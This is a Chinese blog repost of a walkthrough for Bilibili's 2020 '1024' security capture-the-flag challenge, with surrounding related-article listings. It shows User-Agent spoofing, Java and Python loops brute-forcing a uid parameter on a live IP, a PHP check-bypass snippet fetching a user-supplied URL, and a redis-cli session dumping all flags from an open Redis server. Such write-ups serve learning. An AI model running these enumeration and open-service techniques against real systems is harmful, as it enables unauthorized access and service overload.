php代码庆祝程序员节,2020-1024程序员节首届哔哩哔哩安全挑战赛Write Up

最新推荐文章于 2021-10-31 18:55:18 发布
最新推荐文章于 2021-10-31 18:55:18 发布
阅读量449 收藏
点赞数
文章标签: php代码庆祝程序员节

第一题

“页面的背后是什么” 指网页源代码

Ctrl+U 查看网页源代码 看到向一个地方发送了get请求

86afc8061877523df800266cff255a68.png

发送一个请求,或者直接找找flag1相关的东西就能找到

第二题

"真正的秘密只有特殊的设备才能看到"指需要使用bilibili Security Browser浏览器访问

使用抓包工具抓包

把浏览器(UA)伪造成"bilibili Security Browser"

需要注意的是如果是Postman需要添加Cookie

7da0bd309ca93a11d2ed802d8663b382.png

第三题

“密码是啥”

密码是啥可以 自己试,此外,用网上给的弱口令词典是没有前途的~

043ba51eec26ccf896500bf144742245.png

第四题

"对不起,权限不足~"指你的身份不对

cb306dd46a4178b16275adf2dcd47ccb.png

MD5

521799f0d633a652e95fe8d63609803f.png

猜测角色名字,首字母大写

5302d3a89f73bda7c20491a5076861c1.png

第五题

Ctrl+U 查看网页源代码,看看它想要干什么

注意里面有个神奇的uid

ed15ae870d09b5334b1673b417f17112.png

暴力遍历要从合适的位置开始

Java版本

for(int i=100336889;i<100999999;i++){

Request.Builder builder1 = new Request.Builder();

Request build1 = builder1.url("http://45.113.201.36/api/ctf/5?uid=" + i)

.header("Charset", "UTF-8")

.header("Connection", "Keep-Alive")

.header("Content-Type", "application/x-www-form-urlencoded")

.header("Cookie", "session=xx; role=ee11cbb19052e40b07aac0ca060c23ee")

.get()

.build();

try{

JSONObject j=JSONObject.parseObject(new HttpClient().newCall(build1).execute().body().string());

//System.out.println(j);

if(j.getString("code").equals("200")){

System.out.println(j.getString("data"));

}else{

if(i%100==0){

System.out.println(i);

}

}

}catch (Exception e){

e.printStackTrace();

}

}

Python版本

for uid in range(100336889,99999999999):

params = (

('uid', uid),

)

response = requests.get('http://45.113.201.36/api/ctf/5', headers=headers, params=params, cookies=cookies, verify=False).json()

if response['code'] != '403':

print(response)

print(uid)

第六题

“结束亦是开始”

硬猜得到 /blog/end.php。

扫描

test.php

test.php的内容是jsfuck

12e95431d6ec4e6b2b36ea1c44fd7d05.png

执行

f5e4ae511ae552a1cbf851f7a65bc1e3.png

unicode 解码后是“程序员最多的地方”=>GitHub

搜索

e5dddb7df530b066ca414568778cc9e8.png

//filename end.php

$bilibili = "bilibili1024havefun";

$str = intval($_GET['id']);

$reg = preg_match('/\d/is', $_GET['id']);

if(!is_numeric($_GET['id']) and $reg !== 1 and $str === 1){

$content = file_get_contents($_GET['url']);

//文件路径猜解

if (false){

echo "还差一点点啦~";

}else{

echo $flag;

}

}else{

echo "你想要的不在这儿~";

}

?>

构造参数URL

结合前面题目的url猜测

这里跳转第十题

这里跳转第七题

ac18d6d9762af284ed9eff768912d947.png

61c17430f5cafd2b3d93aec4c9b4a662.png

第七题

第六题中

第八题

第六题中

端口扫描

服务器开启了6379端口,Redis的默认端口

[root@iz2ze77]# redis-cli -h 120.92.151.189 -p 6379

120.92.151.189:6379> keys *

1) "flag4"

2) "flag6"

3) "flag7"

4) "flag9"

5) "flag8"

6) "flag1"

7) "flag2"

8) "flag3"

9) "flag5"

10) "flag10"

120.92.151.189:6379> get flag1

"3b96173a-b3df4cdd-22d4c15f-261e7309"

120.92.151.189:6379> get flag2

"bd871042-1e09a130-3ddd4faa-cebdb048"

120.92.151.189:6379> get flag3

"c7f7a7c2-28b7f895-5432152b-6410e042"

120.92.151.189:6379> get flag4

"d338e3c8-93215105-258d79ba-b364e59c"

120.92.151.189:6379> get flag5

"612d1886-044898af-6c1e9dba-b58ad075"

120.92.151.189:6379> get flag6

"8aa6f15d-65e37c9b-78c2bc37-00ed5aee"

120.92.151.189:6379> get flag7

"b78ce2aa-10d03327-f2035f4e-55c17689"

120.92.151.189:6379> get flag8

"d436b982-2b81aa54-49a8d2db-87ab951a"

120.92.151.189:6379> get flag9

"b3238659-b81512e6-3a307c74-9877ecc5"

120.92.151.189:6379> get flag10

"e5653416-595b3d0c-4c2a57ee-c026350e"

因为扫描的原因,服务器很卡,容易掉线。

[root@iz2zeihez ~]# redis-cli -h 120.92.151.189 -p 6379

Could not connect to Redis at 120.92.151.189:6379: Connection refused

not connected> exit

[root@iz2zeihez ~]#

第九题

第六题中

第十题

第六题中

33ebff25c196a79a16a17c4fb82e1f0c.png

下载

二进制编辑器打开

b0c04b0a5ad926cdedcc181652293e02.png

参考文章

周云歌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020-1024程序员节首届哔哩哔哩安全挑战赛Write Up
无限迭代中......
10-24 1万+
第一题 “页面的背后是什么” 指网页源代码 Ctrl+U 查看网页源代码看到向一个地方发送了get请求 发送一个请求,或者直接找找flag1相关的东西就能找到 第二题 "真正的秘密只有特殊的设备才能看到"指需要使用bilibili Security Browser浏览器访问 使用抓包工具抓包 把浏览器(UA)伪造成"bilibili Security Browser" 需要注意的是如果是Postman需要添加Cookie 第三题 “密码是啥” 密码是啥可以自己...
php安全挑战赛,BiliBili1024安全挑战赛题目及解答(关联ctf)
weixin_31727797的博客
03-12 1145
哔哩哔哩在 1024 程序员节这天上线了一个安全挑战赛模块,里面的内容类似于 CTF 挑战赛,目前共有 10 道题目供用户参与解答。题目与解答过程/答案1.页面的背后是什么地址: http://45.113.201.36/index.html直接访问,提示需要使用bilibili Security Browser浏览器访问~。查看源代码,有两段 js 代码:$.ajax({url: "api/ad...
哔哩哔哩1024安全挑战赛 Bilibili CTF题解(含代码)
u013560932的博客
10-25 4729
题解 2020-10-25 Bilibili在1024节上线了一个CTF挑战赛,非常amazing啊,虽然前面几题还是很简单的,不过大佬太多了,服务器都已经被扫爆了,redis也连不上去,在我做题的时候甚至各种资源文件都已经不存在了,真是诸神混战,活生生把单机打成了联网,我都怀疑是不是有人故意删了资源文件,故意暴力扫描,让后面的人没法做题,拿不到奖品。 第一题 没啥好说的,查看源码,input里面的value就是flag 第二题 更改UA为bilibili Security Browser发送请求
1024,程序员节
热门推荐
代码君的博客
10-24 1万+
1024程序员节是中国广大程序员的共同节日。1024是2的十次方,二进制计数的基本计量单位之一。程序员(英文Programmer)是从事前端、后端程序开发、系统运维、测试等的专业人员。程序员就像是一个个1024,以最低调、踏实、核心的功能模块搭建起这个科技世界。1G=1024M,而1G与1级谐音,也有一级棒的意思。 以下表情包,博君一笑 程序员的高级自黑 每当想放松的时...
行业数据-2020年2-5月哔哩哔哩平台美食视频收藏量.rar
09-11
标题中的“行业数据-2020年2-5月哔哩哔哩平台美食视频收藏量”揭示了我们要探讨的核心内容:2020年2月至5月期间,在哔哩哔哩(B站)这个知名的中国视频分享平台上,美食类视频的收藏数量。这涉及到互联网大数据、...
行业数据-2020年2-5月哔哩哔哩平台美食视频播放量.rar
09-11
标题中的“行业数据-2020年2-5月哔哩哔哩平台美食视频播放量.rar”表明这是一个关于哔哩哔哩(B站)平台上美食视频在2020年2月至5月间的播放量统计报告。这个压缩包文件包含了一个名为“行业数据-2020年2-5月...
bilibili-frontend-style-guide:哔哩哔哩前端代码风格规范
05-17
哔哩哔哩前端代码风格规范》是一份详尽的前端开发指南,旨在为哔哩哔哩(B站)的前端工程师提供一套统一的代码编写标准,以提高代码质量和团队协作效率。这份规范涵盖了HTML、CSS和JavaScript等多个方面的内容,...
openbilibili-go-common-1:哔哩哔哩哩bilibili网站后台工程源码来自https
03-22
4,使用Rider建立以后(retag),回滚可以基于Rider的retag来回滚,而不是回滚大仓库的代码; 5,提供RPC内部服务放置在业务/服务中,任务放置在业务/作业中,对外网关服务放置在业务/界面,管理后台服务放置在...
行业数据-2020年2-5月哔哩哔哩平台美食视频月度发布量.rar
09-11
标题“行业数据-2020年2-5月哔哩哔哩平台美食视频月度发布量.rar”指的是一个压缩文件,其中包含了关于2020年2月至5月期间,哔哩哔哩(B站)平台上美食类视频的月度发布数量的数据。这份数据可能对研究B站美食视频...
程序员节快乐:扔掉代码一起庆祝
artwebs
09-14 1810
今年的9月12日是属于程序员的节日——程序员节(俄语:День программиста),是一个俄罗斯官方节日,每年的第256天,也就是平年的9月13日和闰年的9月12日。今年为闰年,所以今年的程序员节为9月12日。 设立程序员节要归功于一名在并行技术网页设计公司工作的职工——Valentin Balt。2002年,他收集签名向俄罗斯联邦政府请愿,请求将这一天定为程序员节。2009年7月24日
太原理工软件学院c语言2020,庆祝软件学院成立十周年创意设计之logo投稿入围展示...
weixin_42509796的博客
05-20 467
经过同学们积极的投稿以及工作人员们认真评选,庆祝软件学院成立十周年创意设计入围名单新鲜出炉啦!工作人员在此首先感谢同学们对本次创意设计征集活动的支持,其次恭喜从众多作品中脱颖而出的入围作品。现在,请欣赏入围的logo作品。软件1805裴小玉作品简介:该作品是为了庆祝软件学院成立十周年而制作的,是一个以数字十为基本图的logo,选用红色黄色为基本配色,象征学院会越来越好,今后无论举办什么都会红红火火...
记bilibili 2021 1024程序员节安全攻防挑战赛
Wawyw's Blog
10-25 1370
赛题地址:https://www.bilibili.com/blackboard/20211024.html 题目1 AES解密,密码:happy_1024_2233,密文是底下两行字符,需拼成一行(一开始确实没想到是这样!) 在线解密网站:http://tool.chacuo.net/cryptaes 题目2 F12,一番寻找下在home.vue中找到藏着的flag 题目3 下载压缩包,解压后得到eval.php <?php /* bilibili- ( ゜-
java程序员拜年代码_程序员的新年祝福是什么样的?
weixin_30323179的博客
02-13 1460
2019就要到来了,马上要收到各种形形色色的新年祝福,尽管有一些简单真诚的祝福语,不过大多是千篇一律的罐头短信。程序员作为一群高智商群体在这辞旧迎新的时刻怎么能一直玩那些老掉牙的梗呢!你想发出去的祝福是啥样的呢?如果没想好不妨先看别人写的程序员“专属”祝福01前端程序员祝福<2018>2018再见2018><2019>2019你好………………2019>02Jav...
程序员笔试之哔哩哔哩2021后端开发 单选题收集整理(五)
qq_34124009的博客
08-16 3069
1.以下函数的时间复杂度是 void func(int x,int y,int z){ if(x<=0) print("%d,%d\n",y,z); else{ func(x-1,y+1,z); func(x-1,y,z+1); } } A.O(x2x^2x2 * y2y^2y2) B.O(2x2^x2x) C.O(2x2^x2x * 2y2^y2y * 2z2^z2z) D.O(xyz) 2.下列正则表达式不能完全匹配字符串aabbb的是 A.a{2}b{3} B.a+b+c* C.[a-z]* D
Web基础$_GET和 $_POST
hhh
08-31 6762
GET传参和POST传参; $_GET传参: 分析这段代码,意思就是用GET方式获得变量what的值,当what的值为flag时,就打印出flag{}; 因为$_GET传参时请求的参数是在url中的,所以我们就直接在后面加上?what=flag,其中?是变量的标识,这句话表示有一个名为what,值为flag的变量; $_POST传参: $_POST传参是在消息体中的,因此我们...
哔哩哔哩2021-1024程序员节-安全攻防挑战赛3-4题wp
i8o6o6的博客
10-31 320
第三题 打开题目给的网址是让我们下载一个php文件打开是一串php代码: 重要代码行注释: 最上面的注释是给了测试的环境,也就是你需要去内个网址里面找flag; 第八行的if()函数限制了我们传入的这个数组的最大元素数是三; 接下来的for循环和里面的if()函数的意思是遍历args[]这个数组的所有元素,而且每个元素要满足正则表达式的匹配,这里的pre_match() (可以先去菜鸟学习一下这个函数)函数返回值是0或1,也就是说你的数组元素每个都要要匹配这个正则表达式才不会执行exit
新年将至, 程序员如何以代码送出新春祝福
孙叫兽的博客
02-06 1万+
程序员是如何给大家送出新春祝福的?
哔哩哔哩2021-1024程序员节-安全攻防赛1-4解
m0_46736332的博客
10-25 853
哔哩哔哩2021-1024程序员节-安全攻防赛1-4解 萌新方向 1. 安全攻防–1 题目链接:https://security.bilibili.com/sec1024/q/r1.html 打开之后发现 f12 抓包 都没有结果,看了看链接,也没有扫文件的必要了。ctf中我们要充分利用到每个出现的字。既然说了是解密,那就从解密下手,肉眼观察字符串我们无法去辨认这串字符的加密方法。happy_1024_2233也看不出来什么,后来我有一个朋友跟我说是aes加密,happy_1024_2233是密钥,那直接
你了解哔哩哔哩的黑马程序员的c++课程吗
最新发布
02-15
是的,我知道哔哩哔哩上的黑马程序员 C 语言课程。黑马程序员是一个著名的IT培训机构,它在哔哩哔哩上提供了很多高质量的视频课程,包括 C 语言课程。这门课程适合初学者,教授了 C 语言的基础知识和应用技巧。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值